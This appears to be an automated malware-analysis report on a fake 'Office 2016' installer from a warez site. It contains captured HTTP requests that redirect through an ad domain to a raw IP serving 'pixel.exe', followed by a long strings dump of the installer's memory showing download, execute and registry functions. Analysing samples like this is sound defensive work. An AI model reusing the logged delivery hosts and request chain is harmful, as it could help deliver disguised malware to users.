K....NDx....P.^1.5...4.nZ.*`lUS..E-TZ=..........IpeW.\.=..Nk.1............G...m...MwWJ....(.o..2.../.Olc.wR...J.....r.ys..O.r5.s..oLR...T.B`BE..I.Z......jY..]...M...~....|..'..4.&_.....NxC.\;..Y.W.1.Q/.JC......
...N~.....X.g...v=.k..#..2z.....N...Rv...[.....nhr...`#...' YZ].d.yI......
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Mon, 02 May 2016 04:59:28 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Mon
, 02 May 2016 04:59:28 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE..

HEAD /?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em PortuguÃªs-BR (32 e 64 Bits) - PH Downs HTTP/1.1

Accept: */*

Host: 162.243.100.13

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Mon, 02 May 2016 04:59:28 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.3

Content-Disposition: attachment; filename=pixel.exe

Content-Description: File Transfer

Content-Length: 60723

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/force-download

GET /downloadimage/1264/13/d99394816486d094825965657734c00d/logo4.png?logotipo=automatico&uo=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&nada=true HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ad5.adswarez.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 02 May 2016 04:59:26 GMT

Content-Type: image/jpeg

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=db7251cddee5fc32504072ca48c5a02d71462165166; expires=Tue, 02-May-17 04:59:26 GMT; path=/; domain=.adswarez.com; HttpOnly

X-Powered-By: PHP/5.5.7

CF-Cache-Status: MISS

Expires: Mon, 02 May 2016 08:59:26 GMT

Cache-Control: public, max-age=14400

Server: cloudflare-nginx

CF-RAY: 29c8e75fcd393714-ARN

1cd9........JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG
 v62), quality = 100....C.............................................
.......................C..............................................
.........................?.n..".......................................
.....................}........!1A..Qa."q.2....#B...R..$3br........%&'(
)*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.............................
......................................................................
...........................w.......!1..AQ.aq."2...B.....#3R..br...$4.%
.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................
..............................................................?.....`q
[email protected]_.F;......ns...s.................#...s...;z...........^.....
f?..K....u..j.z..4M_....(.O.t.2.W.o.8".-7N..........d.#...F...i.......
.~..L...f...........t.o%...5..x'...3\K..e.>.y...F.d....h.3.G...$?..
..........c.Jk^..?...a...........SH..F.....A6..5.K.{e..(.8.#}.i......A
.....:..._.jz..f....jw....L?i.!..jz..7.r,1..y...h...@...=....X........
.|#....X\...QG.......*.Z..f:.E..kb.....2P._I...k...l.8..fS..,.;1.L.~..
.y.c.b......cp..)..6....8l4....-...W....\N...?....-.. ,..A.........N..
.C.... .N6..y.a..........Uqi........o.....M.'._.............4KO.[x)t..
h.G...{..5..........Y.. .[B..................<Y.j...4]o.v...Zx.E...
...A..3.c....?.h....R.|=...M.;.....u......../C..N..9.? .G.eT0.6.`..43\
k....h...%l...5...5...J8.N4>.:.t^*.1........8.....W1....q9.W.L]...c
r....S9....)....?.Z.....~.O....[[...#..m9.?>8$w.....9.c u<s.

<<< skipped >>>

HEAD /comp/1264/13/gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI.exe?plataforma=c1&&uo=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&ud=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html HTTP/1.1

Accept: */*

Host: ad5.adswarez.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Found

Date: Mon, 02 May 2016 04:59:28 GMT

Content-Type: text/html

Connection: keep-alive

Set-Cookie: __cfduid=d000249d68a1c0a85133403ba896186991462165168; expires=Tue, 02-May-17 04:59:28 GMT; path=/; domain=.adswarez.com; HttpOnly

X-Powered-By: PHP/5.5.7

Location: hXXp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em PortuguÃªs-BR (32 e 64 Bits) - PH Downs

Server: cloudflare-nginx

CF-RAY: 29c8e76cbefa3714-ARN

HTTP/1.1 302 Found..Date: Mon, 02 May 2016 04:59:28 GMT..Content-Type:
 text/html..Connection: keep-alive..Set-Cookie: __cfduid=d000249d68a1c
0a85133403ba896186991462165168; expires=Tue, 02-May-17 04:59:28 GMT; p
ath=/; domain=.adswarez.com; HttpOnly..X-Powered-By: PHP/5.5.7..Locati
on: hXXp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvo
yMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV
5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2Ganlkqv
ZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-
u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_
WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=h
ttp://VVV.phdowns.com/2015/09/office-2016-professional-plu
s-download-portugues.html&n=Office 2016 - Completo em PortuguÃªs-B
R (32 e 64 Bits) - PH Downs..Server: cloudflare-nginx..CF-RAY: 29c
8e76cbefa3714-ARN..

<<< skipped >>>

The Installer connects to the servers at the folowing location(s):

%original file name%.exe_1676:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

.DEFAULT\Control Panel\International

File I/O error %d

lzmadecompsmall: Compressed data is corrupted (%d)

lzmadecompsmall: %s

LzmaDecode failed (%d)

shell32.dll

/SUPPRESSMSGBOXES

/PASSWORD=password

Specifies the password to use.

For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline

/SL5="$%x,%d,%d,

Inno Setup Setup Data (5.5.0)

Inno Setup Messages (5.5.3)

user32.dll

oleaut32.dll

advapi32.dll

RegOpenKeyExA

RegCloseKey

GetWindowsDirectoryA

MsgWaitForMultipleObjects

ExitWindowsEx

comctl32.dll

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

External exception %x

1.0.5.a0.1_54944

%original file name%.exe_1676_rwx_00900000_000F7000:

.idata

.edata

P.reloc

P.rsrc

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

>)a9>.aV>

.EXatuv

.vRLFO

g.rp=

asT.qykp

.EW)$

.GYonVz

N5:%C

.Rtyz/

v.Qzjab/Gdg

<;_)5<>^

.nk"n

8r7Q%c

l9.ZS0

%xJQtW

n"!a.zo

@NtcP}

%XRHt5

$".kL

.Iz\(

Ub%Cy

.rzOn'$

.zY3-

c$%xzl4

Y8|t%d

C#h.np

H%f-Uw

.mlw3

_Jÿ

AciekeYifeS;x

>t.hk

a.NYc

C.oaa0

c.XAs

duudpyq

z=%U;Mna

i%X'ze

%D'[b

e%D%(g

`-AhsrPb\oK.dfj

2HN2G%d

.fh(S

.ZjnkUo

YÑx*

.tsvtz06*_pj]R

V=-b}

rbg.sg"lj

nvze>6%Xj`

lZgiqpWqyvaH%DH

CmdiHcJ(dTv

%Cj^H

%7uC,D

.BV}%

".Ndqn

.Eidi^D

QER.CK

OD.BL

'8503333

g%XFh

:#cy%F

TÉ-

.GKzL

p~t%uLp

.IOt8t

U(.YJ

%dizhkpe

XX.syB

;@37=<;43@?

P1@6084(>%DSUX

=73<M>=.Ux

850>\`)9

O#%Fo-(

Eaq%f

!.PF?

#ZK.sr

.mmmlm-A

.vhWttZi_jF

dnf^n_ang1%Dqc

UFLZ%X(Ud`SVH

UB^[email protected];

.de=8.

_&3 g.tE

n.SJ7

n%CQ,W

ly.As

Yk0~f64eS.sv5

mGz_mY%C

.DD6'\

_cmd>

R.%C=

%CH:8j

.uvDcmq#0

.EbH8

!L<CLC,".xjJba

z.Mc:d

4%s%"

.xVP$

.eavuMe

7X.rk

ztYm%UV

-eh#%C

)ra%X

ttcpr

SSh_z

kh'HSg%u

.nleUdzyd

(5u%U

U.GFr%

VL.lpqagjy

WÓ's,q]

jX.YS

.msws6

n&%dj

O'%S2

zoh.ultbi

wulfw3%XD

/Kx5%X#'

l-kfp.uc-x

2f-q@%U,_

a5X%sT#

f_i%U

PYVZ[SEUYYHV(36.HPR~K9

jeZy%C

h.uFf

$.BFU^m4

ÊF[&6^

@0E.GT5@=N2

c>

r.Jxu

=K.UH

%u7.kK

[email protected]

jNnz.JN

uA&%fl

;l$%SR(

tr.aT$

`wu2!a.NYDU<

p'.Ld.PM

F>.Aw

Q*[H.bw

?%X2!

rBi[.Ku

#?%f.d

!E.Jm8f

HdYfabxfbaHxbtabFdfbVtftpbx

user32.dll

GetKeyboardType

advapi32.dll

RegOpenKeyExA

RegCloseKey

oleaut32.dll

GetNamedPipeHandleStateW

GetCPInfo

GenericLoader.dll

KWindows

{E=i.wA,

/,%SU|

aUs%d

os.yt

*!.Jl

:VB.tr}

o.TWUE

2%uuc

D%x4@Y

a8.Oj

?A.Wu`

.izL7

|Vi.Ws

}{%Uv

Ís'

$J.jv

i.Xan

#A.KVgka

%C=Nm\

`aVjX(.PY

7d%x.I

s.CqC

(kP.Az!

9}.rx

.do5b3[

~GßT

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

I/O error %d

Integer overflow Invalid floating point operation

%original file name%.exe_1676_rwx_00BB0000_0009C000:

.rsrc

kernel32.dllwGetLongPa

ORT_(_.SCK_LI

;.OVI

Keyl;

7.jicA

%s[%d]

%s_%d

.Xl0'

D.qCV*

.FDiag

Boross&%Dt`x

O7E(AL("%s",4),"

%U}H!

IA.ZZZI

.BWHi

on.XiS

HotkeysK<B

.CC[p

.Fjei

0J.WM

%x@`0

m=v.tT

-a.nm*

D8&%uG

tLcibD.ZP

jn^Io.ye0t

ToiZc.Xhj

%Dl!%F

,-\ T,/.Om

_^Cwxkosx,.vl,,

zpz.egz6

7\webqs

I.PPT

|1lnax.kbjqjfy`e

Rvbgi.cjhph

-I.dG

|9o.Fh

fkhb<7 Si_.huJz

%XH-e

].jlg

luYvT.whxyW?

1.2.3:d`

THttp

,M.DJ

oRhwbG.xO| O

ic6.fA

,0489999

yjl.hhp

mw.ll

d.vLO0V

.dsjeit/*`hj

.lnkk&h

f(,.hgzc[gkF=,V

l6.LF

CrTHop;

.ibJn

rPWR.DB

.po{)y'

v/<aZS.So

gM).qd

^.ex-

;`Q.Ro

'-iagt</.Vq

q.TkAi

S.hJQ

/.CWM`bku*

 WT.yg

(.yo@

5%sY@

3ß3$

"O.vR

6?0N2=.Lq

W]E).rG

nt.ihM`

Fc.Uv

*,.fdgj`$

J2t.cr

\).Yw

5/.jm

 %S/NC

@b0a.nB

Y]H.ifs

.Lb/[ynb4huO*bAe

ix.CBOPM

hy,.kle

>.Zg{

/.qVw,

ir1.FF

TPipeSl

JAC^@[SQWLHEM G.sw4

0Nm5(.mS

[URNDT].Lw/OFL[^\\[@IAJH-

A-_.pwY

%csFLh/

QsIE%f

LJ_.ge

ym^rk.Um_gt

Dlb.vok

@N3%x

IWeb

grfKey?6

CmdG

=.UtF

.mI2uj

'%s' (

9999$ (,

.ftp:

s.YwB<

[%s]rBN4

ki2.Bg@

un.jE

m%d;k

.1..WAHO9[Zcn

\EXE}/

&^M}.ja

[email protected]

BLOKPERHCV.Zblfn

zgcEi.Tc/h(ZA*

f[VT*.lJ,e

0Lm,.uomy

!dMSGo

:=.zX

anldf.RW

IaER%S

e.HvwVty]

r.vY?U

I.HH8

.HEo*

2<3'.rB

%5u$%

o-F.Dwiyrcg

JS_>.NI

mjC.Oon1I

jehGbeags.qBhkk[l

NPIPE_DATA'

@[email protected]_^.e

N/d %U

HMVH9>.PE

.CONTA

v=.vN3

*Wr.Eb

R.aLA

`.NrG

m.cV7

BLv.pW

lHwmTo.txJ@l

xEXE&

D.DLP

.TJNaWTw

?zfc.bzG

u-f.woaq1

]no^dun.Vx

.Mmzep

[email protected]

)hj.bR

I.XXPr

GUkszv.ra%!

Z>/.ory

.TFHAP

{"5.Bw2*W">

.>p.Xjg

r0 .Sp%8

.mv~0

I3j%D-

;O7%s

1.Fy<*5

0-xV}>

L.gWq

J}.kU

=-s.Virtua

Key#T

"$ %),'8

$"!(&&$'

H.JXAfDb

 /*-( ,'.-!

*/.)*72-7)

#-**(-#,

.PMDF<7I

KERNEL32.DLL

advapi32.dll

comctl32.dll

comdlg32.dll

gdi32.dll

mpr.dll

ole32.dll

oleaut32.dll

shell32.dll

URLMON.DLL

user32.dll

version.dll

HtmlUIInstallerSADLL.dll

%original file name%.exe_1676_rwx_00C51000_0015C000:

kernel32.dll

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

htKeyword

EInvalidOperation

u%CNu

%s[%d]

%s_%d

.Owner

EInvalidGraphicOperation

USER32.DLL

comctl32.dll

UrlMon

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

TKeyEvent

TKeyPressEvent

HelpKeyword

crSQLWait

%s (%s)

IMM32.DLL

AutoHotkeys

AutoHotkeys$

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

OnKeyDown

OnKeyPress@

OnKeyUp

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

A`bng`@ikc-4,uUxlxs-4,Ht.HA

Vh-0,Cd`jiVhlxwd-0,tLcibD.ZP

TThreadExecuter

TScanAllWindowsCallBackData

Portuguese

ZkkdDocjn^g-4,o.ye

^ioM-3,iiziGmwItI.cG

\h-2,Jfal\`dgxj-4.DZ

,-\ T,/.Om

@gfj V,he-2 V,meaeo-3,jho-3,j V,jeju`,--0 V,krfuzy5 V.ua

hcl.sf

Cwxkosx,.vl,,oa`i-2,q S-3,kej-4,zpz,,egz6,. P.g,2

-2,tu-4,asqjj Q,gv,.NV/hnw/,,INJW^FZ\S@AZ^P\KSY\agqxos`S,,: U,nmb`-12 Q,af-1,df-0,bx U,z`e`-2-. S,MDKXZL[SWJ@UZZ]DWS]nc-0,y`wjRVjx856=@naj,,/.p N

webqskv`T-Y

oj-2,`ac<<*kcb.jo

ak-2,`ob<< T,jcb.je

IN]JVN]K]KJ]B]F^UF@@]\v-2,ujbRBjazsnc^s`lkr-1,`-1,].jl

7Teah P,Ckh`-3,fkgo-2,7*NNYO.uh

1.2.3

THttpTimeOutThread

THttpCallBackShell

Gx-21,\igh]ixyj-42,M.DJ

A`qjz``-0,ZkdkNgij.pc

Kcqjpc`-0,Aaj-1,gEdafa`.pM

Jmvgknm Q,2,,<,./accwcxgeni5 W,O_GB R,=>)27,.Pkbjhu-4-.,IV,,8)37,.Spejblx Q,2,,< W.g W

Ecezcb-4 S,Tmeic6.fA

Bc/K-33,`-1.jG

Jbhblnrefc V,H-0,bv-1,li.AT

Uju-0,c-2 W,Ht-2,h-4.Rq

Ijv-1,h-0,jm Q,Jq-1,n-2,/,.u`l,.lnmw Q,ll`oj`zh`m-2 Q,xjzi`vz Q,kbz`.^l

Q-0,iznjib Q,`u,.tgu-0,qyi-1,ulb.a-F

Ob-4,/dcdzfe, kh-3,`/r-2,jld.vL

V-1,ns-4-.,hx V,lmdeehea,.mdhi Q,hi`onezhdh-2f.a

ebP-3,dLfnda`-4,`yj-4.PL

Efqem,.wb-1,k T,bu,.wnr,.pd<,.-i.a

,.fivzjfa,.`a U,jjad-0,cs?,.W.y

Ogl-02,wo`i S,Kov S,ea`mcmzji`,.Qg`if V-3,oqgc P -,(.a,>

Ehvbbi T,z V,tfbcdw,.dbpz V,tl-0,tdf,.dfpkb W,l` V,Kb-2,r*Nabnegcc/,.ahj`a W,wa V,ufb-4 W,l` V,tl-0,tdf-2 V,ubzct,-.^,v

Gj`f)jh S,fp-1 S-0,`-4,vlvzp)d-1,f)uopzl`d)l` S,Ywa-0,p U,Clm`,.,.)v-0,py`mw`ki S,`koa`igwp U,zl)aatgiabm U,hqfh,.`-1,w-1,fgq,.plwxf-0,),.w-01,gmn U,omfqff-0 U,FFHA,.qlt-0,fzq,.wf U,cbb`,.p-1,wk,->Y

Kdaf V,ag-4,higib U-1,`t`il V,vmmkv(-1,i U,jm V,czg-1,`f(,.hgzc U-1,`gk(-=,V

Fk-1,tg-22,om,.zromb V,jgzeaxltkj), ,.zfi,.c-1,ef,.ji``lezgfh-2-.,jtko-2,cj,.-3,ozffsz,.hhw,.mgzo)tkmloxkm(,.Ifo`i)ra,.-0,c-2,zhtz,.-2,nk,.miy`eioj W,( P,i.i

Ebs-1,dtrgn W,uzldm,.inumbqc-1,hc VS -,sia,-ki`j W,qgyoi-0,y W,hkz W,eacicmyni` SW,Aadia,.yh V-1,htro-4,s V,zeb V,jbphbbfb PS,).a-2

Cfba,.Kd`-3 W,nwmb-00,ghe5,..v-3

[ofye`h,-ja-2--,mbc,-oaacim-0,dc`-1--,xa/n`a-1,h,, V.Zg

 UPWR.Dg

N`jn V,/egf/gddaah-3,fkey/eyo/gge-1,ao T-i.u

,.bvu,.be QC.Y

,- S,(yvvacc/ijeff,-ei-1,hv/-0,aajx S.So

Mnlgkc R,vk-3,wa-20 R,miamvkk,. T,czqp,.mg T,ga R,@axlhanf T,c`fa P,B.y

Zj-20,ej,.-1,m-30,k-00-.,goaa-1,mk R .,ez-2,z(mk,.aa,.^iz-2,k(bajm Q.is

^j-10,c-2,fak/-0,gi/k`-0,ac`mkj-2-,,i-2,`a/_ny-1,j/a`kj R.zw

Fft`n-2 Q,Cd-3 Q,hlbd,.sks-2,lao,.,-.\`

 S .,gv*jgclk-1,`dz,.qbo` U,y-03,ue-1,z`n,. V,^.e

Bo-0,jjt,.I`w,.gnizehi-2 T,TUBw,- W,lqu W,zld W-2,m-0,b,.mr W,ghmbiem=,.Nq

Q]byc/n-4,t`y,-bzn,-r`, dh-13,k`fhdca-4--,bfxf V-10,lej W -,iagt</.Vq

Wpmzgom`c W,@asihaeca-1 T,bv-1,ku T,mkca,.bukc> W._,t

[c-0,pki,.gfoawfxkpmh,.cf,,kpzc-1-.,(oafm6,.,..C

//Y-1,o5,,.gn

 V,5 U,`n` U,aj,.fbcb`g/akov,.cq`c U,nngk S,karmcadg/aw S,n-3,u S-0,fwfnj T,5.j

5,,-3,yo-3,y7,..XI

Pjk T,wg-1,rap,.`vm-3,taf,.gkl`agvgkj RV,haq-2 T,`cze T,pkgakxa` R,zlel,.vas-0,awvk`,-,,N T

Yjs-1,bjqko/Kox-0,*Cdknhbjc,.cjfjn-2,=,..bv

Wik W,pn-0,u`d,.cld-2 W,mnz W,k`xb S,soidd,.tvq-3,hqu,.* S,hiilskc S,soidd,.ufp-0,bpu P-3 C

 U,D(,.btkyG-4,>,.._,e

Exz,-ek,.`o`a-4,s,-yeoc,.Kfx-2,ecci,-ib`conzdec,.ikyo Q,*`k`*-4,k-14,h-2,yoi4,-.YU

]DKizHi-4,exc-1,Hc`hk-3.GI

L_LCUNTF, KHC.op

0.0.0.0

3?:96=>?59:;.ZQ

6?0N2=.Lq

;768>1-80

cabinet.dll

\fgejnhg,.Dhr,.f-3- ,z`b, -2,gbyz,..8y

M-3,pxahg,-Xhn-2-,,klahhq,-e-3 S,db,-v-3,i,-at,,lmbxef-4-,2,qbohp-3 P -,w-4,udmj,,lmbxef-4-,,bmh,, U,byxhn-2,x7 S.NW

000000000000

 ;7.Q,>N-Y,[ T,Tc.Uv

, /@zs-4,Kacj2,..cr

,./Z-1,n5/.jm

HhluHmad,.slr,.auu-1,enuk`,-g-1,k` Q,MM^,-,.vhr-0,hy; M,N

Y]H.if

d-3,tdcQqdc.Lb

TUninstallExecuter

)hix.CB

Y^`acxziagKphh-01,hy,.kle,.jh, mzhjzmi, afar,.gchk V-C.8

Ehnj^smekrq<,.jg-4,3b N

1,,`ir1.FF

 W,Ivgs,,Xokyk4 W.iB

TPipeServer

TPipeObject

TPipeServerListener

TPipeClientU

isrPipe

CJ[hx.Xu

@ggh,-O`uygbjht,.Retkgi V,kt-4,i-1 VU,nm

 T,5 W.Rx

_.Wo*BC-T5p7d.V-b,

Actnddf/exn-0,a-2,c-21--,@zfinj(-4,g-1,xbl-1,m,-*ffkm5(.mS

NAER_[URNDT].Lw

Ifq`afgjdga,.O-1,hjalu,.ihro,-hrzhdvz,-gi P -.a-R

Ea-0,xmcdi-3,/Ioo`-2,bx/Fmaj(odnfkik(huaiaeli``v(j-3,`e6,,.Cw

Vjfegl`,.cs`ms-4,lah, wkr-3,w`co U,lgo U,K-3,bqMio`4 V.`1

LJ_.ge

fxk S,Cym^rk.Um

Zndfkhb,-lnnaok, ,-o-2,ubx5 W.Ru

D-1,dgskhh`,.thn`rrfbm V,n`rru-0,brnaou W,hhjba.b

ole32.dll

olepro32.dll

IWebBrowser

IWebBrowserApp

IWebBrowser2

TEWBWindowSetResizable

TEWBWindowSetLeft

TEWBWindowSetTop

TEWBWindowSetWidth

TEWBWindowSetHeight

bstrUrlContext

bstrUrl

OnWindowSetResizableH

OnWindowSetLeft

OnWindowSetTop

OnWindowSetWidth

OnWindowSetHeight0

grfKeyState

TComTargetExecEvent

CmdGroup

nCmdID

nCmdexecopt

hhctrl.ocx

URLMON.DLL

SHDOCLC.DLL

rcmDefault

rcmDebug

DontExecuteScripts

DontExecuteJava

DontExecuteActiveX

DisableUrlIfEncodingUTF8

EnableUrlIfEncodingUTF8

CheckFontSupportsCodePage

DisableSubmitUrlInUTF8

EnableSubmitUrlInUTF8

lpMsg

PMsg

pguidCmdGroup

TTranslateUrlEvent

pchURLIn

ppchURLOut

CmdID

pszUrl

pszUrlContext

szPassWord

ErrorUrl

OptionKeyPath

OverrideOptionKeyPath

OnTranslateUrl

OnCommandExec

'%s' is not supported.

TMsgEvent

TKeyEventEx

Port

Password

poPortrait

OnKeyDown,

0.750000

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(

This object does not support this method (

Unsupported type for Parameter with Index %d

Method call unsuccessful. Object: %s, Method: %s, Exception: %s , Source: %s.

hXXp://

hXXps://

eiOnKeyDown

eiOnKeyPress

eiOnKeyUp

OnKeyPress

Handler with EventID = %s already exists.

Error on IConnectionPoint.Advise

Source don't have connection point for [%s]

KV,.nw``-4 Q,fogmgohj U-43,dpko; U.9,Q

MAPI32.DLL

LeftPopup

YR-0,xh]izn.cQ

2.1.0.0

This exe was created with an old version of HtmlAppMaker.

-0,cnyzgcEi.Tc

https

Sf[.t,T*.lJ,e

Iii,-Mrz-2 U,tk-1,pc-2,y U,no-3 U,rg``b,.bpr P.Y,e

Iinli V,sm,.uomy V,sjk V,Wpaaug-2,u W,datj,, W,n

,,`-3.XW

MSGALL

irsoMsgDialog

irsoJoinPath

irsoGetCmdLineParam

irsoGetCmdLineCount

irsoGetCmdLineIndexOf

irsoGetCmdLineParamValue

irsoGetCmdLineAll

irsoRegCreateKey

irsoRegCreateKeyTree

irsoRegDeleteKey

irsoIsRegKeyExists

irsoRegListKeyValues

irsoRegListKeyKeys

irsoRegSearchKeyKeys

irsoRegCopyKey

irsoGetRegKeyInfo

irsoHttpGetData

irsoHttpGetDataInThread

irsoLibraryExecuteProc

irsoLibraryExecuteProcW

irsoLibraryExecuteProcWithResult

!irsoLibraryExecuteProcWithResultW

irsoExecute

irsoExecuteDllInProcess

irsoSaveExecuteUsingCMD

irsoIsMutexExists

irsoCreatePipeServer

irsoStopPipeServer

irsoSendDataToPipeServer

irsoSetDebugLogUrl

irsoGetDebugLogUrl

irsoGetWebBrowserHandle

irsoGetCurExeCheckSum

irsoGetExeInjection

TExecArgs@

iubnyybRolkanldf.RW

b-1,[-1,e.Hv

.html

H-4,njBdi-2,o-4,r.vY

[zhhi)ec-30,heo-2,db,.ddrffe V ,,`sua[daGz@v-3,@ouzhmjkm S,a-S

-4,fhxXahcxgw.rg

gghYcjrf.ae

jehGbeags.qB

PIPE_DATA

PIPE

LNYCD_^.eP

HMVH9>.PE

[iinzx-13,)i`s-0,u,.ulaaqlh4 W,Axck\E,.E-0,cytl-3-.,hkfkd-2- 2 W,@I9 W,ombkkmml)-40,wyc-1,s)e-2 W,gcy W,lboeeij)-3.D

Qaflhj W,zk/cgwneba/sfa/OzicRG T,Muas-1,b-1 T,`edals)w/NK3/aohceogd WST,jnzlju,.MJ W,xa-1,naj/n-2 T-0,ha T,chy T,`u,.j`s,.eyfghneba Q.bo

Zcdxk, hy,.j Q,xklhyzyx*fjba,.-4,n*-3,yd-1,keu*F-4,lf[B Q,H-1,dvyky Q,eladiz,,r*GN6*hjmfljba,. VQ,lobmoj, ue,.ydga-2,d*g-4 QR,F@DSQGNIOG^GOHIC@N( T-V.9

